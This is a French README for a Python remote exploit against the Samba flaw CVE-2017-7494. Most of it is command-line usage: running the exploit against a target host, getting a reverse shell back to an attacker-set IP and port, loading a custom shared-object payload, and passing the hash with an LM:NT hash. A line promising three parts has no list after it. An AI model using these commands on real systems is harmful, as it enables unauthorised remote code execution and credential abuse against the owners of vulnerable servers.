
Exploit Python pour CVE-2017-7494
Exploit à distance pour la vulnérabilité SAMBA CVE-2017-7494, alias is_know_pipename!
Cet exploit est divisé en 3 parties :
Tant que la cible est vulnérable et que la charge utile est correcte pour le système d'exploitation et l'architecture cibles, l'exploit est assez fiable.
Exécutez l'exploit contre votre cible et attendez l'apparition du shell :
$ python noSAMBAnoCRY.py -r RHOST
$ python noSAMBAnoCRY.py -r RHOST -u userTest -P 123 --lhost RevShellIP --lport RevShellPort
Pour les versions de Samba 3.5.0 à 3.6.0, il suffit d'ajouter l'argument -o 1
python noSAMBAnoCRY.py -r RHOST --lhost LHOST --lport LPORT -o 1
Exécutez votre propre .so personnalisé
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes 00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 -c cp.so
Pour un port Samba personnalisé, utilisez l'argument -p
$ python noSAMBAnoCRY.py -t RHOST -p 4450 -u userTest -P 123 --rhost shell_ip --rport shell_port
Si vous tombez sur des hashs smbpasswd et ne pouvez pas les casser, vous pouvez maintenant faire un pass-the-hash en utilisant l'argument --hashes=LM:NT
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes=00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 --lhost RevShellIP
Ce dépôt est inspiré du dépôt : joxeankoret/exploit-CVE-2017-7494 et Archivaldo